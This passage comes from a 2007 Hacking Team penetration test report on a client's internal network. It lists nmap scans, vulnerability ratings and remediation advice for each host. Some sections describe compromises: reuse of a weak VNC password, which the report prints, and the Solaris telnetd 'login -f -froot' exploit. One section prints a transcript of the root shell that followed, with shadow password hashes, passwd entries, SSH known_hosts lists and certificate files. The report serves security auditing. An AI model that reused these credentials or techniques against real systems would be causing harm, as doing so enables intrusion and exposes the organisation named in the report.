Vendor/OS Microsoft Windows Version Server 2003 3790 SP 1
Hostname LONWINCL1N2
Compromised Not Compromised Directly Info Domain user
Auth Not needed
The host was alive and these additional information could be extracted:
53/tcp open domain Microsoft DNS
88/tcp open tcpwrapped
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
389/tcp open ldap Microsoft LDAP server
445/tcp open microsoft-ds Microsoft Windows 2003 microsoft-ds
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1025/tcp open msrpc Microsoft Windows RPC
1027/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
1248/tcp open nsclient Netsaint Windows Client
2301/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer 5.91)
3268/tcp open ldap Microsoft LDAP server
3269/tcp open tcpwrapped
3389/tcp open microsoft-rdp Microsoft Terminal Service
10000/tcp open backupexec Veritas Backup Exec 9.0
49400/tcp open http Compaq Diagnostis httpd (CompaqHTTPServer 5.91)
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 173 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
This host is a Windows Active Directory Domain Controller.
It was possible to gain Administrator privileges on the host using a Domain User with the right
privileges.
6.5.8 192.168.210.34 [Unsafe]
Rating: unsafe
Vulnerabilities found: V6
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Disable the cleartext telnet/ftp services or replace them with telnets/ssh/ftps
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Embedded
Vendor/OS Linux Version TANDBERG Codec
Release F5.3 PAL
Hostname EURO MTS
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
21/tcp open ftp oftpd
23/tcp open telnet?
57/tcp open priv-term?
80/tcp open http?
1720/tcp open H.323/Q.931?
Uptime: 94.375 days (since Mon Apr 16 14:53:45 2007)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Unix© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 174 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing them with
their cryptographic counterparts.
6.5.9 192.168.210.20 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Microsoft Windows Version Windows XP
Hostname LONAV02
Compromi
sed
No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
80/tcp open http Microsoft IIS webserver 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
38292/tcp open landesk-cba?
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: OS: Windows
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 175 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.5.10 192.168.210.183 [Safe]
Rating: safe
Vulnerabilities found: n/a
Risk state: n/a
Skill level required to exploit the vulnerability: n/a
Solution: n/a
Discovery method ICMP Echo Ping on Initial scan
Availability Daylight (Workstation/Notebook)
Class Server
Vendor/OS Microsoft Windows Version Windows XP
Hostname NW0450 NW0450.MTSGROUP.ORG
Compromised No Info None
Auth Not detected
The host was alive and these additional information could be extracted:
25/tcp open smtp Microsoft ESMTP 6.0.2600.2180
80/tcp open http Microsoft IIS webserver 5.1
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn
443/tcp open https?
445/tcp open microsoft-ds Microsoft Windows XP microsoft-ds
990/tcp open ftps?
5900/tcp open vnc VNC (protocol 3.6)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=255 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Host: NW0450.mtsgroup.org; OS: Windows
6.6 Servers in Network 100.100.200.0/24
6.6.1 100.100.200.5 [Compromised]
Rating: compromised
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 176 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
Vulnerabilities found: V6, V7, V9
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Change the VNC password and make it unique for this server; disable finger service; replace ftp
with ftps
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version SunOS
Hostname MILSUNATS-PPF.MTS
Compromi
sed
Compromised by Vnc Info Vnc with weak password
Auth Vnc with password edcrdx
The host was alive and these additional information could be extracted:
7/tcp open echo
9/tcp open discard?
13/tcp open daytime Sun Solaris daytime
19/tcp open chargen
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.0.1 (protocol 2.0)
25/tcp open smtp Sendmail 8.12.10+Sun/8.12.10
37/tcp open time (32 bits)
79/tcp open finger Sun Solaris fingerd
111/tcp open rpcbind 2-4 (rpc #100000)
153/tcp filtered sgmp
177/tcp filtered xdmcp
423/tcp filtered opc-job-start
512/tcp open exec
513/tcp open rlogin
514/tcp open tcpwrapped
515/tcp open printer Solaris lpd
540/tcp open uucp Solaris uucpd
587/tcp open smtp Sendmail 8.12.10+Sun/8.12.10
665/tcp open unknown
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
923/tcp filtered unknown© 2007 Hacking Team
All rights reservedNumber of attachments: 0 Page 177 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
1453/tcp filtered genie-lm
1509/tcp filtered robcad-lm
1521/tcp open oracle-tns Oracle TNS Listener
1989/tcp filtered tr-rsrb-p3
3052/tcp filtered PowerChute
4045/tcp open nlockmgr 1-4 (rpc #100021)
5679/tcp filtered activesync
5801/tcp open vnc-http AT&T VNC (User oracle; Resolution 1268x982;
VNC TCP port 5901)
5901/tcp open vnc VNC (protocol 3.3)
6001/tcp open X11 (access denied)
6112/tcp open dtspc?
7100/tcp open font-service Sun Solaris fs.auto
31416/tcp filtered boinc-client
32771/tcp open ttdbserverd 1 (rpc #100083)
32772/tcp open kcms_server 1 (rpc #100221)
32773/tcp open metad 1-2 (rpc #100229)
32774/tcp open metamhd 1 (rpc #100230)
32775/tcp open rpc.metamedd 1 (rpc #100242)
32776/tcp open rusersd 2-3 (rpc #100002)
32777/tcp open mdcommd 1 (rpc #100422)
32778/tcp open status 1 (rpc #100024)
32779/tcp open sometimes-rpc21?
32780/tcp open sometimes-rpc23?
Uptime: 258.701 days (since Sat Oct 28 15:41:19 2006)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=155 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: milsunats-ppf, milsunats-ppf.mts; OSs: Solaris, Unix
The fingerd service is prone to Information Disclosure.
Ftpd is a cleartext and insecure service, consider disabling it or at least replacing it with its
cryptographic counterpart.
It was possible to login to the Vnc service reusing a Vnc password found on an other
Compromised system leading to local privilege escalation and full system compromise.
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 178 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
6.6.2 100.100.200.13 [Compromised]
Rating: compromised
Vulnerabilities found: V5, V6, V7
Risk state: High
Skill level required to exploit the vulnerability: Low
Solution: Install all OS updates; disable finger service; replace ftp with ftps, telnet with telnets or ssh
Discovery method ICMP Echo Ping on Initial scan
Availability Mostly alive (Embedded/Server/Workstation)
Class Server
Vendor/OS Sun Solaris Version SunOS 5.10 Generic_118844-20
i86pc i386 i86pc
Hostname MTSSYSMON01 MTSIT
Compromised Compromised Directly Info Telnet calling login -f
Auth -froot
The host was alive and these additional information could be extracted:
21/tcp open ftp Solaris ftpd
22/tcp open ssh SunSSH 1.1 (protocol 2.0)
23/tcp open telnet BSD-derived telnetd
25/tcp open smtp Sendmail 8.13.3+Sun/8.13.3
79/tcp open finger Sun Solaris fingerd
80/tcp open http Apache httpd 2.0.54 ((Unix) DAV/2 SVN/1.3.1
mod_ssl/2.0.54 OpenSSL/0.9.7f PHP/5.0.4)
111/tcp open rpcbind 2-4 (rpc #100000)
443/tcp open ssl/http Apache httpd 2.0.54 ((Unix) DAV/2 SVN/1.3.1
mod_ssl/2.0.54 OpenSSL/0.9.7f PHP/5.0.4)
513/tcp open rlogin
514/tcp open tcpwrapped
587/tcp open smtp Sendmail 8.13.3+Sun/8.13.3
898/tcp open http Sun Solaris Management Console (Runs Tomcat
webserver)
3306/tcp open mysql MySQL 4.0.24
4045/tcp open nlockmgr 1-4 (rpc #100021)
6000/tcp open X11?
7100/tcp open font-service Sun Solaris fs.auto
9090/tcp open http Jetty httpd 5.1.x (SunOS/5.10 x86 java/1.5.0_01)
32771/tcp open rpc
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 179 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
32772/tcp open status 1 (rpc #100024)
32773/tcp open mdcommd 1 (rpc #100422)
32774/tcp open metad 1-2 (rpc #100229)
32775/tcp open rpc.metamedd 1 (rpc #100242)
32776/tcp open metamhd 1 (rpc #100230)
32777/tcp open rusersd 2-3 (rpc #100002)
32778/tcp open rpc
32786/tcp open snmpXdmid 1 (rpc #100249)
Uptime: 258.779 days (since Sat Oct 28 13:55:36 2006)
Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=156 (Good luck!)
IPID Sequence Generation: Incremental
Service Info: Hosts: mtssysmon01, mtssysmon01.mtsgroup.org; OSs: Solaris, Unix
Telnetd and ftpd are cleartext and insecure services, consider disabling them or at least replacing
them with their cryptographic counterparts.
The fingerd service is prone to Information Disclosure.
The host has an outdated Solaris version, the supplied telnetd server calls login functionalities with
unescaped arguments allowing a remote user to login with any user, root included, without
supplying a valid password. It was possible to read cleartext Nagios, Cacti, phpmyadmin, wiki,
zabbix, timesheet and other credentials:
SunOS 5.10/5.11 in.telnetd Remote Exploit by Kingcope [email protected]
Trying 100.100.200.13...
Connected to 100.100.200.13.
Escape character is '^]'.
Last login: Tue Jul 17 20:34:01 from 100.100.200.87
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
bash-3.00# /sbin/ifconfig -a
lo0: flags=2001000849<UP,LOOPBACK,RUNNING,MULTICAST,IPv4,VIRTUAL> mtu 8232 index
1
inet 127.0.0.1 netmask ff000000
bge0: flags=1000843<UP,BROADCAST,RUNNING,MULTICAST,IPv4> mtu 1500 index 2
inet 100.100.200.13 netmask ffffff00 broadcast 100.100.200.255
ether 0:9:3d:0:6f:ce
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 180 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
bash-3.00# id
uid=0(root) gid=0(root)
bash-3.00# hostname
mtssysmon01
bash-3.00# ls
jabberd nagios root webadmin zabbix
luca oracle svn wildfire
bash-3.00# ls /
Desktop dev lib platform usr
Documents devices lost+found proc var
TT_DB dvd mnt root vol
backup.sh etc monitoring sbin
bin export monitoring.pub sqlnet.log
boot home net system
cdrom kernel opt tmp
bash-3.00# /usr/bin/isainfo -kv
64-bit amd64 kernel modules
bash-3.00# cat /etc/release
Solaris 10 3/05 s10_74L2a X86
Copyright 2005 Sun Microsystems, Inc. All Rights Reserved.
Use is subject to license terms.
Assembled 22 January 2005
bash-3.00# ls
Desktop bin devices home mnt
opt sbin usr
Documents boot dvd kernel monitoring
platform sqlnet.log var
TT_DB cdrom etc lib monitoring.pub
proc system vol
backup.sh dev export lost+found net
root tmp
bash-3.00# pwd
/
bash-3.00# cat backup.sh
#!/bin/bash
svcadm disable mysql
svcadm disable nagios
tar cvf /scripts/mysql.tar /usr/local/mysql/var/
tar cvf /scripts/nagios.tar /usr/local/nagios/etc/
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 181 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
cd /scripts
gzip /scripts/mysql.tar
gzip /scripts/nagios.tar
svcadm nagios enable
svcadm mysql enable
echo done
bash-3.00# w
6:51pm up 262 day(s), 6:18, 1 user, load average: 0.95, 0.74, 0.66
User tty login@ idle JCPU PCPU what
root pts/3 6:44pm /usr/bin/bash
bash-3.00# cat .ssh/known_hosts
blade_in-s1,192.168.254.181 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAmfusIgH0WlFFOiWxlbGzo2tignRO203OX9CfyoVDJh/186tV9m3K
hvoTFhKZ/lhPvGKHw7fGfgflHtnL/vYed7tdebsAKrWUxbKSFDQqhtzpV2PBEe7Vcd5x2ak/VAsgFFsl
eIQGwDycnaDlKyAUeyTJr9P9mjuE6hFY/go4Vjc=
192.168.253.3 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAtGUopsVVfviGtXqwHVdx73+xh3b9IZ+tAYQzo0SAQtuZsNqIekKJ
Ede6HXTc0dv2Is8XzXzObCqzXUpSqfU3KeMfonil1xRWUwzmfnxlOjLK8PfSBcLO0y+EptshuAzqH6Wj
KTyANqJqiCrmz0L75YBIN4TIoMgmKRDkCOUUey8=
192.168.253.5 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA4j+rKa7zuI2tjAm5d1dBKmmIA5lojw6bzwgcloySHpwon6oRY6Kf
BVgEbY+5bZZyJxIl3dOMIe81B9YWS3/x0XK+ukiwsuwODjC29EMKmw6gDCZvqzUvaajAq9MSaEao7YUO
L3E2+rWSnKjCobNu7umg7RkpXRGm9H3XvI/FvPs=
127.0.0.1 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA0BhoedAzp9tCuxZJwO3sFxJYJKd6plM2VWuUzAm/DGgjMvNd3XTY
OfHVkGLH9karOqTnydERu6D6TdFJ6QYTtrb1qW/XPwITGsdNzsGV/y8Mb5MM+Uqw+qjaFWJr+YwoCS4/
2wuZUYSs9dsPKICG1Mf4OiAxu55pyiJUu4jtuvE=
100.100.200.71 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAvYPABvyEoQvY77wEIfaAodB258iganz7llurR5O+PwbtBWrReUw2
awTbjrjhSkty1nn9kfscVbE01Br6XyKi40sZEjmpBg5BOCp4jTiqHZO6oAvJmeNvcJ1sQtYh3UM7luky
8hr/x+EDIa3uxqM1sgqd6tSNaDiBpIfTtaV/BCc=
ftp1,192.168.253.164 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAtSvnY894LzEtCoVT3oZ/AFrC4gZ/KZ2URocgr3YGvZi0kuAjuP8R
31Ubj3YiMcdHJ3XJ1ewgbLg5paYN6FHLXnw7aNoMp6Ps2LcwgiVH0cMbMBlzgzmHijozhw+xXXKWxobB
MRcDONuJBYDEfi6LANQkCp6CBXPzWPU/nExo2Es=
blade_out-s5,192.168.253.165 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAxE6FKliG6HEaFc41SP0OKavxdMUuYxizBCfkisatZNumqbv2l21e
xawpu3uohkG6YtUgv2duiE52sLz+o2g6ZfEzlFoDLC1VZwYAJwNG2pL2yNzIHobQUXr694EQXJriGL9x
ZSY6ytK+1G9/o0OHAHB6RwhkW+CWoUrB/QK7jPk=
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 182 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
mtsdfeed3,192.168.254.162 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAurqZHmEqpROLuoAKKzkZLdnmzGqb1LqvYBBmsdSg7DKUa4cqpJXU
DyO2uj06ulp4ggf7tTKhHhRkbl1etZpFn5zFW7GNoLD3AxqAYcLAMilkJKrCSqi0Jq0ha45PTSeBQ4bw
q+OBsQ6GklZAVKLQltRLnNOkhSe5K7+wdhn0yYU=
mtsdfeed1,192.168.254.160 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAopIVRm03K1Hhy9GxHLqDOIjuou6hjhiF6osXrQM85dVu/R/zy04C
sodPyL/97MhpkfGDeGiIShaoOfDPq+Mr/PRA49WEwMQIjTW8lEhQwaVvFHlJARItC5vWlyDz9HEgvgiH
fGoMQbP4p8Zq0cCluwwJMwsRNb0OYhARbDQTbjM=
mtsdfeed2,192.168.254.161 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAzCBY5AIFJdMJNlwjSTJdcBXP5YE8I36Laqe+BbfGUFKbwvgIAQ/+
xbCLewRamULWQ0aSOUQi0Xy0eWutkIz+shO4cvvOyuQEfb3pEgBjwh75DyETknFoHhUnu1CZmeX5Sv3N
udP86ZmhIoWzXWN/HyNnQO9/UXK38AiodSeMkGk=
mtsdfeed4,192.168.254.163 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAvKBu4/BLynmq98XRozFuEBoVroeSz0Y5pCQH5se2+JlgDzUJIg/x
iopUCezTuTHzmMt3ib0flCiWZk+esPImXJ3aIFiHcGgOCT2uBmytyOjdJiklzQjk6fylUwV26e8PQkPj
VZwLgFcPe6YLmxVsOkDqHj5J/60OsQd5fUjxXl8=
blade_out-s3,192.168.253.163 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA5HQNQh/WhURtDGqat8V32mh5ZtFelgnm2IU6l3xk+SE2M8imGlLD
CO0gb9lCIDd01edOEpXT+3HZVraaHPBBhohqWbxBPYiiXea5ejs+e6lqr+hhojMlcf46NPLDaku+O5mv
PfMX1FnFR7jP2uP9/W00uiCKvf+VmMFp3BpSuxk=
blade_out-s4 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAtSvnY894LzEtCoVT3oZ/AFrC4gZ/KZ2URocgr3YGvZi0kuAjuP8R
31Ubj3YiMcdHJ3XJ1ewgbLg5paYN6FHLXnw7aNoMp6Ps2LcwgiVH0cMbMBlzgzmHijozhw+xXXKWxobB
MRcDONuJBYDEfi6LANQkCp6CBXPzWPU/nExo2Es=
www.lucameneghesso.com,62.193.210.50 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA224pdYOQNvIXLCWFaLAzxUZ4gJtYn0ZGOKFTSfcaGXQjzQychx7B
B34h/Kr6mhskp6BAzWwIaO2mR3DuhuUzd8NnZLTDg6tlg7oTETbNe/za4I/w2p90RD7GKD1xAshHK5ug
MY6ALFrtQksh5amYeS0HOsmPmLaBdkx/YTsYvac=
lmeneghesso-lap,100.100.200.125 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEA0QAfr/cbbJHso0pAFS+PNjgQoXjeA7mqnCwioyBSDLNVqGjswWXI
ninmmynbXYed+v2MfLbj0uu2tHCwg3mlJ/2xR4sKW+IgsWumTPywP2OnsDodOMvKV9v6aLWMLl6O2m9Y
ihl3zeAbpRakhs/8QH6IdfWTWeK+U/xQ+76JISM=
milatstest,192.168.254.21 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAnlpm4UgMYbsEevv72rnaDVHuFCZVhU/sdlU3IanLS/t/1gkvjfUT
9RqdK4efD5D240Q6Yd8vG8f8l2A01KUXBpMR7dY0VHBNUgCUFaHpxeIQHaRuE6ioXCU2AB9tsZETIGyJ
sgwqCYZXHFuzfUKaauSTGifv0BPlp5pa3ONnh5U=
bash-3.00# cat /etc/shadow
root:zxScQXNmGEN4w:6445::::::
daemon:NP:6445::::::
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 183 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
bin:NP:6445::::::
sys:NP:6445::::::
adm:NP:6445::::::
lp:NP:6445::::::
uucp:NP:6445::::::
nuucp:NP:6445::::::
smmsp:NP:6445::::::
listen:*LK*:::::::
gdm:*LK*:::::::
webservd:*LK*:::::::
nobody:*LK*:6445::::::
noaccess:*LK*:6445::::::
nobody4:*LK*:6445::::::
luca:Sb0Ec16QoDOUY:13174::::::
mysql:*LK*:::::::
webadmin:nMNo5pljmFVF2:13021::::::
nagios:U/H.GDifGCTFE:13641::::::
zabbix:*LK*:::::::
jabberd:*LK*:::::::
oracle:*LK*:::::::
wildfire:*LK*:::::::
bash-3.00# cat /etc/passwd
root:x:0:0:Super-User:/:/sbin/sh
daemon:x:1:1::/:
sys:x:3:3::/:
adm:x:4:4:Admin:/var/adm:
lp:x:71:8:Line Printer Admin:/usr/spool/lp:
uucp:x:5:5:uucp Admin:/usr/lib/uucp:
nuucp:x:9:9:uucp Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico
smmsp:x:25:25:SendMail Message Submission Program:/:
listen:x:37:4:Network Admin:/usr/net/nls:
gdm:x:50:50:GDM Reserved UID:/:
webservd:x:80:80:WebServer Reserved UID:/:
nobody:x:60001:60001:NFS Anonymous Access User:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x NFS Anonymous Access User:/:
luca:x:100:1::/export/home/luca:/usr/bin/bash
mysql:x:101:100::/home/mysql:/bin/sh
webadmin:x:102:101:Web Server Administrator:/export/home/webadmin:/usr/bin/bash
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 184 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
nagios:x:103:102:Nagios Systems Monitor:/export/home/nagios:/usr/bin/bash
zabbix:x:104:104::/export/home/zabbix:/usr/bin/bash
jabberd:x:105:105:Jabber Instant Messaging
Deamon:/export/home/jabberd:/usr/bin/bash
oracle:x:106:1:Oracle software owner:/export/home/oracle:/bin/ksh
wildfire:x:107:107::/export/home/wildfire:/bin/sh
bash-3.00# ls -la
total 26
drwxr-xr-x 11 nagios nagios 512 Mar 22 11:04 .
drwxr-xr-x 4 root sys 512 Nov 3 2005 ..
-rw------- 1 root root 6 Nov 3 2005 .bash_history
-rw-r--r-- 1 root root 144 Nov 3 2005 .profile
drwxr-xr-x 2 jabberd jabberd 512 Nov 3 2005 jabberd
drwxr-xr-x 12 luca other 512 Mar 8 2006 luca
drwxr-xr-x 7 nagios nagios 512 Feb 7 23:00 nagios
drwxr-xr-x 4 oracle oracle 512 Nov 4 2005 oracle
drwxr-xr-x 3 root root 512 Mar 22 11:04 root
drwxr-xr-x 3 root root 512 May 29 2006 svn
drwxr-xr-x 22 webadmin webadmin 1024 Jan 16 2007 webadmin
drwxr-xr-x 3 wildfire wildfire 512 Jan 11 2007 wildfire
drwxr-xr-x 3 zabbix zabbix 512 Feb 1 2006 zabbix
bash-3.00# pwd
/export/home
bash-3.00# who
root pts/3 Jul 17 18:44 (100.100.200.87)
bash-3.00# w
6:55pm up 262 day(s), 6:22, 1 user, load average: 0.40, 0.50, 0.57
User tty login@ idle JCPU PCPU what
root pts/3 6:44pm 2 /usr/bin/bash
bash-3.00# cat .ssh/known_hosts
ftp1,192.168.253.164 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAtSvnY894LzEtCoVT3oZ/AFrC4gZ/KZ2URocgr3YGvZi0kuAjuP8R
31Ubj3YiMcdHJ3XJ1ewgbLg5paYN6FHLXnw7aNoMp6Ps2LcwgiVH0cMbMBlzgzmHijozhw+xXXKWxobB
MRcDONuJBYDEfi6LANQkCp6CBXPzWPU/nExo2Es=
lmeneghesso-lap,100.100.200.125 ssh-rsa
AAAAB3NzaC1yc2EAAAABIwAAAIEAtVOGhTdgeXRqs6Qec6TwGzlCFuY7Q7T6puQznFrWv/11t07rVpgD
L43xOJItWJ5N1IvV1X8c9DQsOq4S5HqhqQpxa8+biG6ibWOeo4VfrmpD+p+jDC5iYVL71AQhvXG7c4yS
ExtEGpRdmAGn8YJ8hNBgBJJID7XWF3fVsmA0Qrc=
bash-3.00# pwd
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 185 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
/export/home/luca
bash-3.00# ls
mtssysmon01.crt mtssysmon01.csr mtssysmon01.key mtssysmon01.pem server.crt
server.csr server.key server.pem
bash-3.00# ls -la
total 20
drwx------ 2 luca other 512 May 2 2005 .
drwxr-xr-x 12 luca other 512 Mar 8 2006 ..
-r-------- 1 luca other 993 May 2 2005 mtssysmon01.crt
-r-------- 1 luca other 729 May 2 2005 mtssysmon01.csr
-r-------- 1 luca other 951 May 2 2005 mtssysmon01.key
-r-------- 1 luca other 887 May 2 2005 mtssysmon01.pem
-rw-r--r-- 1 luca other 985 May 2 2005 server.crt
-rw-r--r-- 1 luca other 716 May 2 2005 server.csr
-rw-r--r-- 1 luca other 963 May 2 2005 server.key
-rw-r--r-- 1 luca other 887 May 2 2005 server.pem
bash-3.00# less mtssysmon01.crt
-----BEGIN CERTIFICATE-----
MIICrzCCAhgCAQAwDQYJKoZIhvcNAQEEBQAwgZ8xCzAJBgNVBAYTAklUMQ8wDQYD
VQQIEwZNaWxhbm8xDzANBgNVBAcTBk1pbGFubzETMBEGA1UEChMKTVRTIFMucC5B
LjEfMB0GA1UECxMWSW5mb3JtYXRpb24gVGVjaG5vbG9neTEUMBIGA1UEAxMLbXRz
c3lzbW9uMDExIjAgBgkqhkiG9w0BCQEWE3N5c21vbkBtdHNncm91cC5vcmcwHhcN
MDUwNDIyMTUzOTE1WhcNMTUwNDIwMTUzOTE1WjCBnzELMAkGA1UEBhMCSVQxDzAN
BgNVBAgTBk1pbGFubzEPMA0GA1UEBxMGTWlsYW5vMRMwEQYDVQQKEwpNVFMgUy5w
LkEuMR8wHQYDVQQLExZJbmZvcm1hdGlvbiBUZWNobm9sb2d5MRQwEgYDVQQDEwtt
dHNzeXNtb24wMTEiMCAGCSqGSIb3DQEJARYTc3lzbW9uQG10c2dyb3VwLm9yZzCB
nzANBgkqhkiG9w0BAQEFAAOBjQAwgYkCgYEAo620HqokrjUyhLVQitSM4Qcu06qt
HOL+iKYuQ80pcTn6wxIBEVmds08pTpsSb87frFxUNEK93+26BdNY9US8UUZfQWbU
v7oRjjDHcMMSZAN4URsnr2ftXzuZCQ9S/rxAIy9fKjQbOUr/nnkpTnViibFoeY94
u1HMgeW8hNV8NuUCAwEAATANBgkqhkiG9w0BAQQFAAOBgQCRt/TZDpH2UQ7kn6xn
P2ybAcpjImWO3NIZf6CzfD487cjkkdpMTyl6mU2+GLmtikduM7CHDaM57NY2qSwZ
V3TgZ1MrQEls5+oXNsH2Dx4iY2HfEKYCfusLL2Jh2g4AJcFrvfsaUKDKJnOgtYMk
phSvAyI4LCBzTMVLDKy6YvSazA==
-----END CERTIFICATE-----
bash-3.00# cat mtssysmon01.csr
-----BEGIN CERTIFICATE REQUEST-----
MIIB4DCCAUkCAQAwgZ8xCzAJBgNVBAYTAklUMQ8wDQYDVQQIEwZNaWxhbm8xDzAN
BgNVBAcTBk1pbGFubzETMBEGA1UEChMKTVRTIFMucC5BLjEfMB0GA1UECxMWSW5m
b3JtYXRpb24gVGVjaG5vbG9neTEUMBIGA1UEAxMLbXRzc3lzbW9uMDExIjAgBgkq
© 2007 Hacking TeamAll rights reserved
Number of attachments: 0 Page 186 of 460
All rights reserved. It's explicitly fordbidden to copy, distribute, publish, reuse even in part articles, texts, workflows, images contained in this document without a written permission from the company Hacking Team S.r.l., except for the possibility to use this material for internal use of the company with respect to the underwritten contract.
hkiG9w0BCQEWE3N5c21vbkBtdHNncm91cC5vcmcwgZ8wDQYJKoZIhvcNAQEBBQAD
gY0AMIGJAoGBAKOttB6qJK41MoS1UIrUjOEHLtOqrRzi/oimLkPNKXE5+sMSARFZ
nbNPKU6bEm/O36xcVDRCvd/tugXTWPVEvFFGX0Fm1L+6EY4wx3DDEmQDeFEbJ69n
7V87mQkPUv68QCMvXyo0GzlK/555KU51YomxaHmPeLtRzIHlvITVfDblAgMBAAGg
